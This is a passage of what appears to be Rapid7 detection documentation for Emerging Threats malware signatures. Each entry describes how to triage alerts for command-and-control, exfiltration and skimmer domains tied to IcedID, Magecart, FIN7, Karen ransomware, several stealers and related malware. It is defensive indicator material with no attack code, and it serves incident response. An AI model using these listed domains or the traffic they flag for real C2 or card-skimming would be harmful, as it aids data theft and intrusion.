This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed DCRat CnC Domain (dud-shotline .000webhostapp .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed DCRat CnC Domain in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed DecryptmyFiles Ransomware User-Agent (uniquesession)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Default CobaltStrike SSL Certificate

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed ELF/HabitsRAT CnC Domain in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Elysium Stealer Domain in TLS SNI (download-serv-234116 .xyz)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Elysium Stealer Domain in TLS SNI (get-europe-group .bar)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Elysium Stealer Domain in TLS SNI (manholi .xyz)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Elysium Stealer Domain in TLS SNI (phonefix .bar)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Elysium Stealer Domain (phonefix .bar in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Evil Keitaro TDS Redirection Domain (fiberswatch .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Evrial Domain (cryptoclipper .ru in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Evrial Domain (projectevrial .ru in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed FIN7 CnC Domain (injuryless .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed FinSpy Domain (browserupdate .download in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Get2 CnC Domain in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed GET Request to Jaff Domain (orhangazitur . com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Glupteba CnC Domain in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Glupteba CnC Domain (venoxcontrol .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed GoBotKR Domain in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Godlua Backdoor Domain (c .cloudappconfig .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Godlua Backdoor Domain (c .heheda .tk in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Godlua Backdoor Domain (d .cloudappconfig .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Godlua Backdoor Domain (dd .cloudappconfig .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Godlua Backdoor Domain (dd .heheda .tk in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Godlua Backdoor Domain (d .heheda .tk in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Godlua Backdoor Domain (helegedada .github .io in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed GoLang Dropper Domain (en7dftkjiipor .x .pipedream .net in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed HTTP Request to Known PUA Host Domain

Description

This detection identifies potentially unwanted application (PUA) activity using Rapid7’s Insight Network Sensor. It matches an HTTP request whose Host header is a domain known to serve PUA, such as adware or bundled installers. PUA is generally lower severity than malware, but the host may have installed software the user did not intend, and the same download channels are sometimes used to deliver malware.

Recommendation

Review the alert in question. Identify the process making the request and the software it installed, and remove any unwanted software. If malware is found or suspected, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed IcedID CnC Domain in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is one of the IcedID command-and-control (CnC) domains listed by this rule. IcedID (also known as BokBot) is a banking trojan and loader that frequently precedes hands-on intrusion and ransomware deployment. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the CnC domain.

Recommendation

Review the alert in question promptly. Confirm the SNI value, identify the process and user that initiated the connection, and check for related alerts from the same host and for lateral movement from it. If the activity is not attributable to a security tool or analyst, isolate the host, rebuild it from a known, good source, and have the user change their password.

ET MALWARE Observed IcedID CnC Domain (nothingtodo .co in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is nothingtodo .co, an IcedID command-and-control (CnC) domain. IcedID (also known as BokBot) is a banking trojan and loader that frequently precedes hands-on intrusion and ransomware deployment. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the CnC domain.

Recommendation

Review the alert in question promptly. Confirm the SNI value, identify the process and user that initiated the connection, and check for related alerts from the same host and for lateral movement from it. If the activity is not attributable to a security tool or analyst, isolate the host, rebuild it from a known, good source, and have the user change their password.

ET MALWARE Observed IcedID Domain (80frontluzkher .xyz in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is 80frontluzkher .xyz, a domain associated with IcedID (also known as BokBot), a banking trojan and loader that frequently precedes hands-on intrusion and ransomware deployment. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain.

Recommendation

Review the alert in question promptly. Confirm the SNI value, identify the process and user that initiated the connection, and check for related alerts from the same host and for lateral movement from it. If the activity is not attributable to a security tool or analyst, isolate the host, rebuild it from a known, good source, and have the user change their password.

ET MALWARE Observed IcedID Domain (bruzilovv .top in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is bruzilovv .top, a domain associated with IcedID (also known as BokBot), a banking trojan and loader that frequently precedes hands-on intrusion and ransomware deployment. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain.

Recommendation

Review the alert in question promptly. Confirm the SNI value, identify the process and user that initiated the connection, and check for related alerts from the same host and for lateral movement from it. If the activity is not attributable to a security tool or analyst, isolate the host, rebuild it from a known, good source, and have the user change their password.

ET MALWARE Observed IcedID Domain (deactivate .best in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is deactivate .best, a domain associated with IcedID (also known as BokBot), a banking trojan and loader that frequently precedes hands-on intrusion and ransomware deployment. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain.

Recommendation

Review the alert in question promptly. Confirm the SNI value, identify the process and user that initiated the connection, and check for related alerts from the same host and for lateral movement from it. If the activity is not attributable to a security tool or analyst, isolate the host, rebuild it from a known, good source, and have the user change their password.

ET MALWARE Observed IcedID Domain (deactivate .pw in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is deactivate .pw, a domain associated with IcedID (also known as BokBot), a banking trojan and loader that frequently precedes hands-on intrusion and ransomware deployment. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain.

Recommendation

Review the alert in question promptly. Confirm the SNI value, identify the process and user that initiated the connection, and check for related alerts from the same host and for lateral movement from it. If the activity is not attributable to a security tool or analyst, isolate the host, rebuild it from a known, good source, and have the user change their password.

ET MALWARE Observed IcedID Domain (ldrtoyota .casa in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is ldrtoyota .casa, a domain associated with IcedID (also known as BokBot), a banking trojan and loader that frequently precedes hands-on intrusion and ransomware deployment. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain.

Recommendation

Review the alert in question promptly. Confirm the SNI value, identify the process and user that initiated the connection, and check for related alerts from the same host and for lateral movement from it. If the activity is not attributable to a security tool or analyst, isolate the host, rebuild it from a known, good source, and have the user change their password.

ET MALWARE Observed JS/Magecart Domain in TLS SNI (manag .icu)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is manag .icu, a domain associated with Magecart JavaScript skimmers. Skimmer scripts are injected into compromised third-party shopping sites and run in the visitor's browser, so the alerting host is usually a visitor to a compromised site rather than infected itself; what is at risk is the payment card and form data entered on that site.

Recommendation

Review the alert in question. Identify the web site the user was visiting when the skimmer domain was contacted and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed JS/Skimmer (likely Magecart) Domain in TLS SNI (imprintcenter .com)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is imprintcenter .com, a domain associated with a JavaScript skimmer, likely Magecart. Skimmer scripts are injected into compromised third-party shopping sites and run in the visitor's browser, so the alerting host is usually a visitor to a compromised site rather than infected itself; what is at risk is the payment card and form data entered on that site.

Recommendation

Review the alert in question. Identify the web site the user was visiting when the skimmer domain was contacted and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed JSSLoader Domain (deprivationant .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is deprivationant .com, a domain associated with JSSLoader, a JavaScript-based loader associated with the FIN7 group. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain. Malicious actors use loaders such as this to deliver further malware and gain access to victim organizations.

Recommendation

Review the alert in question. Confirm the SNI value, identify the process and user that initiated the connection (typically a script host launched from a phishing attachment), and check for related alerts from the same host. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed JSSLoader Variant Domain (legislationient .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is legislationient .com, a domain associated with a JSSLoader variant; JSSLoader is a JavaScript-based loader associated with the FIN7 group. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain. Malicious actors use loaders such as this to deliver further malware and gain access to victim organizations.

Recommendation

Review the alert in question. Confirm the SNI value, identify the process and user that initiated the connection (typically a script host launched from a phishing attachment), and check for related alerts from the same host. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Jupyter Stealer CnC Domain (blackl1vesmatter .org in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is blackl1vesmatter .org, a command-and-control (CnC) domain for the Jupyter information stealer (also tracked as SolarMarker), which harvests browser credentials and session data. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the CnC domain.

Recommendation

Review the alert in question. Confirm the SNI value and identify the process and user that initiated the connection. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source, have the user change their password, and also reset any other credentials stored in or used from browsers on the host, since a stealer will have captured them.

ET MALWARE Observed Jupyter Stealer CnC Domain (gogohid .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is gogohid .com, a command-and-control (CnC) domain for the Jupyter information stealer (also tracked as SolarMarker), which harvests browser credentials and session data. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the CnC domain.

Recommendation

Review the alert in question. Confirm the SNI value and identify the process and user that initiated the connection. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source, have the user change their password, and also reset any other credentials stored in or used from browsers on the host, since a stealer will have captured them.

ET MALWARE Observed Jupyter Stealer CnC Domain (vincentolife .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is vincentolife .com, a command-and-control (CnC) domain for the Jupyter information stealer (also tracked as SolarMarker), which harvests browser credentials and session data. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the CnC domain.

Recommendation

Review the alert in question. Confirm the SNI value and identify the process and user that initiated the connection. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source, have the user change their password, and also reset any other credentials stored in or used from browsers on the host, since a stealer will have captured them.

ET MALWARE Observed Karen Ransomware CnC Checkin

Description

This detection identifies ransomware activity using Rapid7’s Insight Network Sensor. It matches the check-in that Karen ransomware sends to its command-and-control (CnC) server. A check-in means the ransomware is already executing on the host, so encryption of local and reachable network files may be under way or imminent.

Recommendation

Treat the alert as urgent. Isolate the host from the network immediately, identify the user and the process responsible, and check file shares the host can reach for encrypted files or ransom notes. Preserve evidence, then rebuild the host from a known, good source, restore affected data from known-good backups, and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Karen Ransomware Domain (karen .h07 .wlh .io in TLS SNI)

Description

This detection identifies ransomware activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is karen .h07 .wlh .io, a domain associated with Karen ransomware. The indicator is this specific subdomain of the shared wlh .io host. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain, which usually means the ransomware or its loader is already running.

Recommendation

Treat the alert as urgent. Isolate the host from the network, confirm the full SNI value, identify the user and the process that initiated the connection, and check file shares the host can reach for encrypted files or ransom notes. Preserve evidence, then rebuild the host from a known, good source, restore affected data from known-good backups, and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Karen Ransomware Powershell Loader

Description

This detection identifies ransomware activity using Rapid7’s Insight Network Sensor. It matches the PowerShell loader used by Karen ransomware as it is retrieved over the network. Seeing the loader on the wire means a host has fetched the stage that installs and launches the ransomware, so encryption may follow shortly.

Recommendation

Treat the alert as urgent. Isolate the host from the network, identify the user and the process (typically powershell.exe or a script host) that downloaded the loader, and check file shares the host can reach for encrypted files or ransom notes. Preserve evidence, then rebuild the host from a known, good source, restore affected data from known-good backups, and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Koadic Header Structure

Description

This detection identifies post-exploitation activity using Rapid7’s Insight Network Sensor. It matches the HTTP header structure produced by Koadic, an open-source post-exploitation framework (a COM-based remote access tool whose stagers run through Windows script hosts such as mshta.exe and rundll32.exe) when its implant talks to its command-and-control server. Koadic is also used by penetration testers, so a match may reflect an authorized engagement.

Recommendation

Review the alert in question. Identify the process that made the request and the user it ran as, and check whether an authorized red team or penetration test is under way. If the activity is not authorized, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Lazarus Maldoc CnC Domain (shopweblive .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is shopweblive .com, a command-and-control (CnC) domain used by malicious documents (maldocs) attributed to the Lazarus Group. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain, typically after a user opened the document.

Recommendation

Review the alert in question. Confirm the SNI value, identify the process and user that initiated the connection, and locate the document and the e-mail or download that delivered it. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Lunar Builder Domain (lunarbuilder .000webhostapp .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is lunarbuilder .000webhostapp .com, a site associated with Lunar Builder malware. The indicator is this specific subdomain; 000webhostapp .com is a shared free-hosting platform and is not malicious on its own. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain.

Recommendation

Review the alert in question. Confirm that the full SNI value matched, identify the process and user that initiated the connection, and check for related alerts from the same host. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart CnC Domain in TLS SNI

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is one of the Magecart command-and-control (CnC) domains listed by this rule. Magecart skimmer scripts are injected into compromised third-party shopping sites and run in the visitor's browser, so the alerting host is usually a visitor to a compromised site rather than infected itself; what is at risk is the payment card and form data entered on that site.

Recommendation

Review the alert in question. Identify the web site the user was visiting when the skimmer domain was contacted and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MageCart CnC Domain in TLS SNI

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is one of the MageCart command-and-control (CnC) domains listed by this rule. MageCart skimmer scripts are injected into compromised third-party shopping sites and run in the visitor's browser, so the alerting host is usually a visitor to a compromised site rather than infected itself; what is at risk is the payment card and form data entered on that site.

Recommendation

Review the alert in question. Identify the web site the user was visiting when the skimmer domain was contacted and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MageCart CnC Domain (mcdnn .me in TLS SNI)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is mcdnn .me, a MageCart command-and-control (CnC) domain. Skimmer scripts are injected into compromised third-party shopping sites and run in the visitor's browser, so the alerting host is usually a visitor to a compromised site rather than infected itself; what is at risk is the payment card and form data entered on that site.

Recommendation

Review the alert in question. Identify the web site the user was visiting when the skimmer domain was contacted and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MageCart CnC Domain (mcdnn .net in TLS SNI)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is mcdnn .net, a MageCart command-and-control (CnC) domain. Skimmer scripts are injected into compromised third-party shopping sites and run in the visitor's browser, so the alerting host is usually a visitor to a compromised site rather than infected itself; what is at risk is the payment card and form data entered on that site.

Recommendation

Review the alert in question. Identify the web site the user was visiting when the skimmer domain was contacted and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Domain (webscriptly .com in TLS SNI)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is webscriptly .com, a domain associated with Magecart skimmers. Skimmer scripts are injected into compromised third-party shopping sites and run in the visitor's browser, so the alerting host is usually a visitor to a compromised site rather than infected itself; what is at risk is the payment card and form data entered on that site.

Recommendation

Review the alert in question. Identify the web site the user was visiting when the skimmer domain was contacted and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Exfil Domain (imags .pw in TLS SNI)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is imags .pw, the domain to which a Magecart skimmer exfiltrates captured data. A match therefore indicates that form data the user entered on a compromised shopping site has likely already been sent to the attacker; the alerting host is usually a visitor to that site rather than infected itself.

Recommendation

Review the alert in question. Identify the web site the user was visiting when the exfiltration domain was contacted and treat any payment card or credential data entered on that site as stolen; notify the card holder and issuer where appropriate. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MageCart Group 12 Domain (pathc .space in TLS SNI)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is pathc .space, a domain attributed to MageCart Group 12. Skimmer scripts are injected into compromised third-party shopping sites and run in the visitor's browser, so the alerting host is usually a visitor to a compromised site rather than infected itself; what is at risk is the payment card and form data entered on that site.

Recommendation

Review the alert in question. Identify the web site the user was visiting when the skimmer domain was contacted and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MageCart Group 12 Domain (toolser .pw in TLS SNI)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is toolser .pw, a domain attributed to MageCart Group 12. Skimmer scripts are injected into compromised third-party shopping sites and run in the visitor's browser, so the alerting host is usually a visitor to a compromised site rather than infected itself; what is at risk is the payment card and form data entered on that site.

Recommendation

Review the alert in question. Identify the web site the user was visiting when the skimmer domain was contacted and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed MageCart Group 12 Domain (zolo .pw in TLS SNI)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is zolo .pw, a domain attributed to MageCart Group 12. Skimmer scripts are injected into compromised third-party shopping sites and run in the visitor's browser, so the alerting host is usually a visitor to a compromised site rather than infected itself; what is at risk is the payment card and form data entered on that site.

Recommendation

Review the alert in question. Identify the web site the user was visiting when the skimmer domain was contacted and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Skimmer Domain (analiticsweb .site in TLS SNI)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is analiticsweb .site, a Magecart skimmer domain named to resemble a web-analytics service so that the injected script tag blends into page source. Skimmer scripts run in the visitor's browser on a compromised third-party shopping site, so the alerting host is usually a visitor to that site rather than infected itself; what is at risk is the payment card and form data entered there.

Recommendation

Review the alert in question. Identify the web site the user was visiting when the skimmer domain was contacted and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Skimmer Domain (cloudflare-cdnjs .com in TLS SNI)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is cloudflare-cdnjs .com, a Magecart skimmer domain that imitates the legitimate cdnjs.cloudflare.com CDN hostname so that the injected script tag blends into page source; the legitimate CDN does not trigger this rule. Skimmer scripts run in the visitor's browser on a compromised third-party shopping site, so the alerting host is usually a visitor to that site rather than infected itself.

Recommendation

Review the alert in question. Confirm the exact SNI value, identify the web site the user was visiting when the skimmer domain was contacted, and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Skimmer Domain (googie-analitycs .site in TLS SNI)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is googie-analitycs .site, a Magecart skimmer domain that imitates Google Analytics so that the injected script tag blends into page source; the legitimate analytics hostname does not trigger this rule. Skimmer scripts run in the visitor's browser on a compromised third-party shopping site, so the alerting host is usually a visitor to that site rather than infected itself.

Recommendation

Review the alert in question. Confirm the exact SNI value, identify the web site the user was visiting when the skimmer domain was contacted, and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Skimmer Domain (googie-analytics .online in TLS SNI)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is googie-analytics .online, a Magecart skimmer domain that imitates Google Analytics so that the injected script tag blends into page source; the legitimate analytics hostname does not trigger this rule. Skimmer scripts run in the visitor's browser on a compromised third-party shopping site, so the alerting host is usually a visitor to that site rather than infected itself.

Recommendation

Review the alert in question. Confirm the exact SNI value, identify the web site the user was visiting when the skimmer domain was contacted, and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Skimmer Domain (googie-analytics .website in TLS SNI)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is googie-analytics .website, a Magecart skimmer domain that imitates Google Analytics so that the injected script tag blends into page source; the legitimate analytics hostname does not trigger this rule. Skimmer scripts run in the visitor's browser on a compromised third-party shopping site, so the alerting host is usually a visitor to that site rather than infected itself.

Recommendation

Review the alert in question. Confirm the exact SNI value, identify the web site the user was visiting when the skimmer domain was contacted, and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Skimmer Domain (googletagsmanager .website in TLS SNI)

Description

